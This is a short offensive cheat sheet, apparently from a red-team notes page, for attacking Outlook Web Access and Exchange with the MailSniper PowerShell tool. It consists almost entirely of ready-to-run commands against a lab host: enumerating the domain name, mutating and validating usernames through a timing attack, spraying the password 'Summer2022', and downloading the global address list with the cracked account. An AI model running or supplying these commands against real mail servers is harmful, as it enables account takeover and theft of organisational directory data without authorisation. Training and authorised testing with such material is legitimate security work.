OWA: MailSniper
Attacking Office 365 / Echange mailserver
MailSniper
Import module
ipmo C:\Tools\MailSniper\MailSniper.ps1Enumerate NetBIOS name of target domain
Invoke-DomainHarvestOWA -ExchHostname mail.cyberbotic.ioUsername list mutation
~/namemash.py names.txt > possible.txtUsername validation (timing attack)
Invoke-UsernameHarvestOWA -ExchHostname mail.cyberbotic.io -Domain cyberbotic.io -UserList .\Desktop\possible.txt -OutFile .\Desktop\valid.txtSpray passwords against identified usernames
Invoke-PasswordSprayOWA -ExchHostname mail.cyberbotic.io -UserList .\Desktop\valid.txt -Password Summer2022Download global address list
Get-GlobalAddressList -ExchHostname mail.cyberbotic.io -UserName cyberbotic.io\iyates -Password Summer2022 -OutFile .\Desktop\gal.txtTooling
Last updated